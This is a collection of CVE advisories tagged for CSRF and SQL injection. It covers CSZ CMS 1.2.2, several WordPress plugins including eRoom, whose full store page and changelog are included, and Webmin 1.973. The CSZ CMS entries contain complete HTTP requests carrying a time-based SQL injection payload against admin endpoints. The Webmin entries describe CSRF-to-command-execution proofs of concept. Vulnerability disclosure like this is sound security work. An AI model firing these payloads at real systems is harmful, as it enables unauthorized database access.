CSZ CMS 1.2.2 is vulnerable to SQL Injection via cszcms_admin_Users_editUser

Description:  
SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases.

    GET /index.php/admin/Users/editUser/%27%6f%72%28%73%6c%65%65%70%28%35%29%29%23 HTTP/1.1
    Host: 127.0.0.1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/index.php/member/login/check
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cszcookie_95afc46801137b6f60a97c469742e6aacsrf_cookie_csz=ac52710dd12b2ae2241aaf6c83f68415; 127_0_01_cszsess=dt2ll8telivrlubjmmkh34ppo976eqea;XDEBUG_SESSION=PHPSTORM
    Connection: close
    

payload: 'or(sleep(5))#  
URL-encode all characters  
payload: %27%6f%72%28%73%6c%65%65%70%28%35%29%29%23

Impact: Read and modify the users database  
Mitigation: Use of Parameterized SQL Queries and Validation

CVE-2022-27163: SQL Injection vulnerability  on cszcms_admin_Users_editUser · Issue #45 · cskaza/cszcms

CSZ CMS 1.2.2 is vulnerable to SQL Injection via cszcms_admin_Users_viewUsers

Description:  
SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases.

    GET /index.php/admin/Users/viewUsers/%27%6f%72%28%73%6c%65%65%70%28%35%29%29%23 HTTP/1.1
    Host: 127.0.0.1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/index.php/member/login/check
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: 127_0_01_cszsess=dt2ll8telivrlubjmmkh34ppo976eqea; cszcookie_95afc46801137b6f60a97c469742e6aacsrf_cookie_csz=e37ee84201b977b79a3b574b64a6a160;XDEBUG_SESSION=PHPSTORM
    Connection: close
    

payload: 'or(sleep(5))#  
URL-encode all characters  
payload: %27%6f%72%28%73%6c%65%65%70%28%35%29%29%23

Impact: Read and modify the users database  
Mitigation: Use of Parameterized SQL Queries and Validation

CVE-2022-27164: SQL Injection vulnerability  on cszcms_admin_Users_viewUsers · Issue #42 · cskaza/cszcms

CSZ CMS 1.2.2 is vulnerable to SQL Injection via cszcms_admin_Plugin_manager_setstatus

Description:  
SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases.

    GET /index.php/admin/Plugin_manager/setstatus/%27%6f%72%28%73%6c%65%65%70%28%35%29%29%23 HTTP/1.1
    Host: 127.0.0.1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/index.php/admin/login/check
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cszcookie_95afc46801137b6f60a97c469742e6aacsrf_cookie_csz=e37ee84201b977b79a3b574b64a6a160; 127_0_01_cszsess=c3vlui957el8pk143j875684bjshnqbi;XDEBUG_SESSION=PHPSTORM
    Connection: close
    
    

payload: 'or(sleep(5))#  
URL-encode all characters  
payload: %27%6f%72%28%73%6c%65%65%70%28%35%29%29%23

Impact: Read and modify the users database  
Mitigation: Use of Parameterized SQL Queries and Validation

CVE-2022-27165: SQL Injection vulnerability  on cszcms_admin_Plugin_manager_setstatus · Issue #41 · cskaza/cszcms

The Visual Form Builder WordPress plugin before 3.0.8 does not enforce nonce checks which could allow attackers to make a logged in admin or editor delete and restore arbitrary form entries via CSRF attacks

CVE-2022-0141

Cross-Site Request Forgery (CSRF) in StylemixThemes eRoom – Zoom Meetings & Webinar (WordPress plugin) <= 1.3.7 allows an attacker to Sync with Zoom Meetings.

**eroom-zoom-meetings-webinar**

**Software**

**eRoom – Zoom Meetings & Webinar**

**Vulnerable Versions**

**<= 1.3.7**

**Fixed in version**

**1.3.8**

**CVE**

**CVE-2022-25614**

**References**

**Credits**

**Classification**

**Cross Site Request Forgery (CSRF)**

**OWASP Top 10**

**A5: Broken Access Control**

**Disclosure Date**

**2022-04-11**

**CVSS 3.0 score**

**Are your websites subject to this vulnerability?**

**Details**

**Cross-Site Request Forgery (CSRF) vulnerability leading to Sync with Zoom Meetings discovered by Ex.Mi (Patchstack) in WordPress eRoom plugin (versions <= 1.3.7).**

**Solution**

**Update the WordPress eRoom plugin to the latest available version (at least 1.3.8).**

**Found a vulnerability that puts your sites at risk?**

**Found a vulnerability? Help us secure the web and join our community of ethical hackers.**

**Are you the developer of this software? Hire our researchers for a thorough security audit.**

CVE-2022-25614: WordPress eRoom plugin <= 1.3.7 - Cross-Site Request Forgery (CSRF) vulnerability leading to Sync with Zoom Meetings - Patchstack

Cross-Site Request Forgery (CSRF) in StylemixThemes eRoom – Zoom Meetings & Webinar (WordPress plugin) <= 1.3.8 allows cache deletion.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Remote type of work requires powerful tools to make sure all the business processes correspond to the level and are done without any loss.  
Video conferences, online meetings, and chat sessions play a significant role in providing and maintaining communication between participants and contribute to smooth collaboration in terms of distance interaction.

To make the process even more convenient, StylemixThemes developed eRoom – Zoom Meetings & Webinar WordPress Plugin to ensure you have a strong tool supporting your business.

⭐ Upgrade to eRoom Pro Features  
⭐ eRoom Documentation

eRoom plugin is natively integrated into bestselling WordPress themes:  
⭐ MasterStudy — Education WordPress Theme  
⭐ Consulting — Business & Corporate WordPress Theme

**Introducing eRoom – Zoom Meetings & Webinar WordPress Plugin**

eRoom – Zoom Meetings & Webinar WordPress Plugin provides you with great functionality of managing Zoom meetings, scheduling options, and users directly from your WordPress dashboard.  
The plugin is a free yet robust and reliable extension that enables direct integration of the world’s leading video conferencing tool Zoom with your WordPress website.

With the help of the plugin, you will be able to create and manage meetings making it easier for every user to participate.

**Zoom Webinars**

Zoom Webinars are an ideal solution for virtual lectures. It is a perfect way to conduct big online events and distribute them to large audiences.

Webinars make a valuable addition to the eRoom plugin and reflect the best practice of a one-to-many communication approach.

Webinars will be perfect for you if you:

*   offer virtual lectures;
*   distribute to a large audience;
*   use the listen-only mode;
*   want to diversify your content;
*   want to manage webinars directly from your dashboard.

With flexible Zoom plans, the number of webinar participants can be up to 10,000.

In eRoom plugin, you will be able to create webinars, add them to any page of the site, and sell them as WooCommerce Products. A convenient management system will be enjoyable for you and beneficial to your customers.

**Who Is It For?**

eRoom – Zoom Meetings & Webinar Plugin is a comprehensive tool, which is an indispensable and necessary solution for lots of educational institutions, consulting firms, and remote businesses.  
It is especially helpful while adapting to distance work. The plugin and the idea of video conferencing are applicable to a wide range of niches, especially it is beneficial for online learning.

This tool is suitable for conducting online training sessions, seminars and lectures, business meetings and online consultations.  
The service is developed for collaboration, training, and technical support and mainly aims to enhance the engagement among the participants.  
eRoom – Zoom Meetings & Webinar helps to shorten the distance and connect you with your coworkers regardless of your location.

**Main Features**

With eRoom – Zoom Meetings & Webinar Plugin you do not need to obtain and combine any other video conferencing solutions.  
It is a complete, comprehensive tool that connects your website with the ultimate eRoom – Zoom Meetings & Webinar service and provides you with lots of control options.

Features:

*   Compatible with WordPress
*   Provides integration of Zoom on WordPress
*   Compatible with Zoom API
*   Enables Zoom video conferencing features
*   Provides shortcode to conduct the meeting on any WordPress page
*   Has admins area to manage the meetings
*   Allows to add and manage users
*   Includes Zoom performance and engagement reports

**Syncing meetings with Google Calendar**

eRoom allows syncing meetings with calendars. You can easily import the meeting file to iCal or duplicate the information to Google Calendar. The only thing you have to do is save the event and set the reminder if you want. This feature is especially useful for those who have lots of appointments, making it easier to keep track and access meetings from their calendar.

**eRoom purchasable meetings**

For those who want to monetize the meetings or offer the customers something new, you can always upgrade eRoom plugin with the paid addon — eRoom purchasable meetings.

eRoom purchasable meetings will add more value to your business. With this tool, you can make your video conferences and webinars available for purchase as WooCommerce products. A great way to monetize your services in a digital format. Offer your customers consultations, and training as live sessions or recorded webinars and let them choose and buy the favorite product.

**Recurring Meetings**

Recurring meetings and webinars is another paid add-on that gives you the ability to create Zoom meetings with recurrency.  
It is enough to create a single meeting and each occurrence will be using the same meeting ID and settings.

Recurring events Increase engagement and productivity. It is especially beneficial for managers and team leads. It also allows holding regular check-ins making sure every user or customer is involved.

**Simple in usage**

Interaction between eRoom and WooCommerce plugins makes it very easy to create a purchasable meeting. All you need to do is to add your meeting as a new WooCommerce product which makes it available for users to buy. Users can join the meeting directly from the browser or Zoom app. There is also a possibility for them to interact with the host via messages.

*   Easily use it on any WordPress website without interruptions.
*   Integrate your website with the most popular conferencing platform Zoom.
*   Apply all the major video conferencing features from Zoom on your site.
*   Use shortcodes and builder modules to add meetings to any site page.
*   Enjoy an intuitive admins panel and effortlessly adjust settings.

**Promote your services in a new way**

Use purchasable meetings as a marketing tool. Find a new audience that will be interested in online webinars and will be ready to pay for it.

**Why You Should Use the Plugin**

eRoom – Zoom Meetings & Webinar WordPress plugin is the perfect solution for your website if you are interested in broadcasting live or hosting virtual events in real-time.  
High-definition video and audio and the ability to join for many participants are the primary things you get.  
Companies can stay connected with text, image, and audio file delivery over instant messaging communications.

The main objective of this plugin is to enable the meetings and joining them straight from the page of your WordPress website.  
The plugin lets you schedule meetings from the WordPress dashboard. There is a shortcode that is generated automatically and can be added to the page,  
so users can see a countdown before the meeting starts and join the meeting directly from the page.

The plugin allows you to use all the features provided by Zoom, such as:

*   Video conference option.
*   Manage participants
*   Live chat
*   Screen sharing option
*   Full-screen mode

**More Awesome Free Plugins by Stylemix**

⭐ Cost Calculator & Price Estimation Plugin  
⭐ Zoom Meetings and Webinars Plugin — eRoom  
⭐ BookIt – a free booking calendar plugin  
⭐ MasterStudy – All-in-One WordPress LMS Plugin  
⭐ Free Classifieds and Listings Plugin – uListing

This section describes how to install the plugin and get it working.

1.  Upload the plugin files to the `/wp-content/plugins/` directory, or install the plugin through the WordPress plugins screen directly.
2.  Activate the plugin through the ‘Plugins’ screen in WordPress
3.  Please find more details on Plugin Installation in documentation
4.  Set Up Page in Menu -> Zoom.

**How do users join the conference?**

Users will have two options. They can join the conference either via the browser or in the Zoom app. Both options provide the same experience.

**How can I manage the meetings, do I have to use Zoom itself?**

Everything is held in your dashboard, the plugin enables the full integration with the Zoom platform. So you use only the admin panel and create and manage Zoom meetings directly on your website.

**Do I have to create a separate page for the meeting or can I paste it to any site page?**

There are shortcodes and popular page builders modules that will help you to insert conference to any page on your website.

**Is it compatible with my theme?**

Yes, the plugin is compatible with any WordPress theme. Install it and enjoy the flawless performance.

**Am I able to manage users?**

The plugin settings allow you to add and manage users. But, you should remember that you can add users in accordance with the Zoom Plans, so they will be active for the chosen plan. More information about Zoom pricing plans you can find here: https://zoom.us/pricing

**Do I need a Zoom account?**

Yes, you should be registered in Zoom. Also, on the plan you are using there depends the number of hosts and users you can add.

**What if I want to save the webinar?**

You can do it, just use the URL link of the video, so users could watch it later. In addition to this, with eRoom purchasable meetings plugin you will be able even to sell your webinars and meetings. Learn more: https://stylemixthemes.com/zoom-meetings-webinar-plugin/

![](https://secure.gravatar.com/avatar/61bf65a54c1d67860455f03aff4286b6?s=60&d=retro&r=g)

I installed this plugin to test vs the Video Conferencing with Zoom plugin which I had already setup. I made a new meeting and enbedded the shortcode into a post. When I went to view the new meeting it took me to a page not found. When I embedded the meeting into a post and viewed the post it displayed a very nice time counter showing the time until the meeting would start, but when I tried to view the meeting in my browser it took me to the page not found. I made the meeting and published it but somehow it couldn't be found when I clicked 'view post' - what's up with that? I'm not going to waste my time trying to figure out something that should be easy. I'll stick with Video Conferencing with Zoom I guess, though it isn't perfect.

![](https://secure.gravatar.com/avatar/c29bc97c851ccc58116de75fa67119d2?s=60&d=retro&r=g)

![](https://secure.gravatar.com/avatar/a3a804c142a50fd0acd23bc9c00b8623?s=60&d=retro&r=g)

It is one of the best WordPress plugins I've ever used.

![](https://secure.gravatar.com/avatar/7b05f5217be5e6baef35ae2853b2df53?s=60&d=retro&r=g)

The free version of eRoom provides good amount of features. They have features which can convert a website to a live one. And the pro version has even greater features. We look forward to buy its pro version too for our startup after sometime

![](https://secure.gravatar.com/avatar/345dd3e75f90f478ad1b0f2bfb886dd3?s=60&d=retro&r=g)

Good plugin and very simple to use. One point to improve : Impossible to have the interpreter function. is a relase is planned ?

![](https://secure.gravatar.com/avatar/3e3d18725f08d08ccb952f436a1b360a?s=60&d=retro&r=g)

An excellent plug-in that meets all my business needs

Read all 50 reviews

“eRoom – Zoom Meetings & Webinar” is open source software. The following people have contributed to this plugin.

Contributors

*   ![](https://secure.gravatar.com/avatar/0231b4ceb0d31b5de8d2d3d430db935d?s=32&d=mm&r=g) Stylemix

**1.3.9**

*   Security update

**1.3.8**

*   Security update

**1.3.7**

*   fixed: Check ‘wp\_get\_current\_user’ function

**1.3.6**

*   fixed: Mailchimp pluggable conflict fix

**1.3.5**

*   updated: Compatibility with WordPress 5.9
*   fixed: Minor visual bugs

**1.3.4**

New: MailChimp Integration. The notification with options to add the user’s data in our newsletters after activating the plugin

**1.3.3**

*   fixed: Removed Freemius SDK from plugin’s core (see the previous update about Freemius SDK)

**1.3.2**

*   new: Freemius SDK for better analytics and understanding

**1.3.1**

*   new: Added new feature roadmap for eRoom

**1.3.0**

*   new: Approve or block entry for users from specific countries/regions
*   new: New meeting e-mail notification for host
*   new: eRoom meeting frontend editing via Elementor
*   fixed: Daylight saving time in time zones
*   fixed: Date format on meeting page

**1.2.9**

*   updated: Nuxy submodule

**1.2.8**

*   fixed: Admin Dashboard notifications lag

**1.2.7**

*   updated: Admin Dashboard notifications updated

**1.2.6**

*   fixed: PRO Features button slider error
*   fixed: Minor PHP errors

**1.2.5**

*   new: Generate password option added

**1.2.4**

*   added: Feedback module inside eRoom settings
*   added: Roadmap voting in eRoom settings

**1.2.3**

*   new: iCal Export and Google Calendar added
*   fixed: Meeting grid styling on mobile devices
*   fixed: Checkbox fields “Require authentication to join for webinar”
*   updated: Shortcode for recurring meetings and category
*   updated: Meetings/webinars connected with Zoom Conference products excluded from the grid and hidden join button with password on single page

**1.2.2**

*   added: Table Details for recurring on admin panel
*   added: Registration form for webinar type
*   updated: changed label/description for fields
*   updated: renamed wpcfto to nuxy
*   updated: Zoom Web SDK API updated to 1.9.1
*   fixed: changed priority for eroom single page and fixed countdown

**1.2.1**

*   fixed: Meetings/webinars deleted from WordPress were not deleted from Zoom (now these will be deleted after deleted from trash)
*   fixed: Image appearance for eRoom shortcodes items

**1.2.0**

*   updated: Pagination for Users section
*   updated: Countdown for three-digit number of days
*   fixed: Zoom token expiration issue
*   fixed: Console error testTool.isMobileDevise is not a function
*   fixed: Set current date if date field is empty
*   fixed: time zone for Azores
*   new: Go Pro page added

**1.1.9**

*   updated: Zoom Web SDK API updated to 1.8.5
*   fixed: Zoom API 2.0 incompatibility issues fixed
*   fixed: Enforce Login and Join Before Host issues fixed
*   improvement: Join in browser 2nd step deleted – the users participate the meeting directly after clicking Join in browser button as attendee
*   improvement: Waiting room option added to Webinar and Meeting

**1.1.8**

*   **added**: Stylemix announcements in admin dashboard

**1.1.7**

*   fixed: time zone changes according to zoom

**1.1.5**

*   improvements: Integration with Bookit Calendar Appointments

**1.1.4**

*   fixed: show alternative host
*   fixed: issue with setting the meeting date later than 1970 that occurs in 32 bit system
*   improvements: hide api secret in frontend.
*   translations: changed meeting setting words ‘Host Join Start’ to ‘Host video’, ‘Start after participants’ to ‘Participant video’

**1.1.3**

*   fixed: date translations in webinar/meeting info
*   fixed: default webinar/meeting date was set to 1st Jan 1970 instead of current time
*   cosmetics: styled meeting/product views in Pearl theme

**1.1.2**

*   WPCFTO Framework updated

**1.1.1**

*   Zoom Meeting Start Time issue fixed.
*   Zoom Synchronization Timezone problem fixed.
*   Readme updated

**1.1.0**

*   Zoom Webinars Integrated.
*   Zoom Meetings & Webinars Synchronization feature added.
*   Single Webinar Shortcode added – \[stm\_zoom\_webinar post\_id=”” hide\_content\_before\_start=””\]
*   Zoom Webinar WPBakery Page Builder element added
*   Zoom Webinar Elementor Page Builder element added
*   Zoom Webinar Email field added to Join in Browser feature
*   Settings Quicklink added to Plugins page.
*   Default Timezone set to Meeting Settings.
*   Zoom menu name changed into eRoom.
*   STM\_ZOOM Class name changed into StmZoom.

**1.0.6**

*   Minor bug fixes.

**1.0.4**

*   Minor bug fixes.

**1.0.3**

*   WPBakery shortcode bug fixed.

**1.0.2**

*   Meetings Grid shortcake added
*   Single Meeting page added
*   Minor bug fixes.

**1.0.1**

*   Minor bug fixes.

**1.0**

*   First Version of Plugin.

CVE-2022-25615: eRoom – Zoom Meetings & Webinar

The Export All URLs WordPress plugin before 4.3 does not have CSRF in place when exporting data, which could allow attackers to make a logged in admin export all posts and pages (including private and draft) into an arbitrary CSV file, which the attacker can then download and retrieve the list of titles for example

CVE-2022-0914

A Cross-site request forgery (CSRF) vulnerability exists in Webmin 1.973 through the File Manager feature.

**..| CSRF\_to\_Command\_Injection2 |..****Description :**

**Exploiting a Cross-site request forgery (CSRF) attack to get a Command Injection through the Webmin's File Manager feature  
**  

**Tested Version :****Webmin 1.973 ( GitHub's latest version 07/03/2021 )**  
**Attack Type:****Remote**  
**Impact :  
****Command Execution****eXploit's C0de POC :**

![](https://github.com/Mesh3l911/CVE-2021-32162/raw/main/exploitPOC.png)

**Vendor of Product :**`https://www.webmin.com`**Additional Information :****`"Webmin is a web-based system administration tool for Unix-like servers, and services with over 1,000,000 installations worldwide. Using it, it is possible to configure operating system internals, such as users, disk quotas, services or configuration files, as well as modify, and control open-source apps, such as BIND DNS Server, Apache HTTP Server, PHP, MySQL, and many more"` According to Webmin's GitHub****Discoverers :****Mesh3l\_911 & Z0ldyck  
Twitter: `@mesh3l_911` ,`@electronicbots`  
**

CVE-2021-32162: GitHub - Mesh3l911/CVE-2021-32162: Exploiting a Cross-site request forgery (CSRF) attack to get a Command Injection through the Webmin's File Manager feature

A cross-site request forgery (CSRF) vulnerability exists in Webmin 1.973 via the Scheduled Cron Jobs feature.

**..| CSRF to RCE CRON |..****Description :**

**Exploiting a Cross-site request forgery (CSRF) attack to get a Remote Command Execution (RCE) through the Webmin's Scheduled Cron Jobs feature  
**  

**Tested Version :****Webmin 1.973 ( GitHub's latest version 07/03/2021 )**  
**Attack Type:****Remote**  
**Impact :  
****Remote Command Execution****eXploit's C0de POC :**

![](https://github.com/Mesh3l911/CVE-2021-32156/raw/main/exploitPOC.png)

**Vendor of Product :**`https://www.webmin.com`**Additional Information :****`"Webmin is a web-based system administration tool for Unix-like servers, and services with over 1,000,000 installations worldwide. Using it, it is possible to configure operating system internals, such as users, disk quotas, services or configuration files, as well as modify, and control open-source apps, such as BIND DNS Server, Apache HTTP Server, PHP, MySQL, and many more"` According to Webmin's GitHub****Discoverers :****Mesh3l\_911 & Z0ldyck  
Twitter: `@mesh3l_911` , `@electronicbots`  
**

CVE-2021-32156: GitHub - Mesh3l911/CVE-2021-32156: Exploiting a Cross-site request forgery (CSRF) attack to get a Remote Command Execution (RCE) through the Webmin's Scheduled Cron Jobs feature

A Cross-site request forgery (CSRF) vulnerability exists in Webmin 1.973 via the Upload and Download feature.

**..| CSRF\_to\_Command\_Injection1 |..****Description :**

**Exploiting a Cross-site request forgery (CSRF) attack to get a Command Injection through the Webmin's Upload and Download feature  
**  

**Tested Version :****Webmin 1.973 ( GitHub's latest version 07/03/2021 )**  
**Attack Type:****Remote**  
**Impact :  
****Command Execution****eXploit's C0de POC :**

![](https://github.com/Mesh3l911/CVE-2021-32159/raw/main/exploitPOC.png)

**Vendor of Product :**`https://www.webmin.com`**Additional Information :****`"Webmin is a web-based system administration tool for Unix-like servers, and services with over 1,000,000 installations worldwide. Using it, it is possible to configure operating system internals, such as users, disk quotas, services or configuration files, as well as modify, and control open-source apps, such as BIND DNS Server, Apache HTTP Server, PHP, MySQL, and many more"` According to Webmin's GitHub****Discoverers :****Mesh3l\_911 & Z0ldyck  
Twitter: `@mesh3l_911` ,`@electronicbots`  
**

CVE-2021-32159: GitHub - Mesh3l911/CVE-2021-32159: Exploiting a Cross-site request forgery (CSRF) attack to get a Command Injetion through the Webmin's Upload and Download feature

Tag

#csrf